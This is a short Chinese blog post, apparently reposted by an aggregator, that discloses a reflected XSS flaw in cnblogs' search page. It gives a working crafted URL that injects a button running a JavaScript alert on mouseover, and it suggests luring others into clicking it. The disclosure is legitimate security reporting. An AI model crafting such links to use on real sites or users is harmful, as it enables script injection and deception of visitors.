找找看XSS漏洞!!! - 走看看

zoukankan html css js c++ java

找找看XSS漏洞!!!

跨站式脚本攻击(XSS)被评为07年排名第一的Web安全漏洞，拿“找找看”试了一把，发现存在漏洞，希望管理员尽快改掉

XSS示例：

诱骗别人点击地址：

http://zzk.cnblogs.com/s?w=cnblogs%22%2F%3E+%3Cinput+type%3D%22submit%22+class%3D%22btnSearch%22+onmouseover%3Djavascript%3Aalert%28%27YouAreHacked%21%27%29++value%3D%22%E9%A2%86%E5%8F%96%E7%A7%AF%E5%88%86&t=

别人粗一看，是博客园的找找看，放心大胆的进来了，结果：

微信扫一扫交流

作者：CoderZh
公众号：hacker-thinking （一个程序员的思考）
独立博客：http://blog.coderzh.com
博客园博客将不再更新，请关注我的「微信公众号」或「独立博客」。
作为一个程序员，思考程序的每一行代码，思考生活的每一个细节，思考人生的每一种可能。
文章版权归本人所有，欢迎转载，但未经作者同意必须保留此段声明，且在文章页面明显位置给出原文连接，否则保留追究法律责任的权利。

查看全文

相关阅读:
HashMap实现分析
 序列化与transient
MySQL计划任务(事件调度器)(Event Scheduler)[转]
利用innodb_force_recovery修复MySQL数据页损坏
 Java对Jar文件的操作[转]
聚集索引与非聚集索引
 JVM学习(二)
一句道破所有的springmvc（面试必备）
springboot中的外界jar的引入：
springboot中的springSession的存储和获取

原文地址：https://www.cnblogs.com/coderzh/p/1261058.html

Copyright © 2011-2022 走看看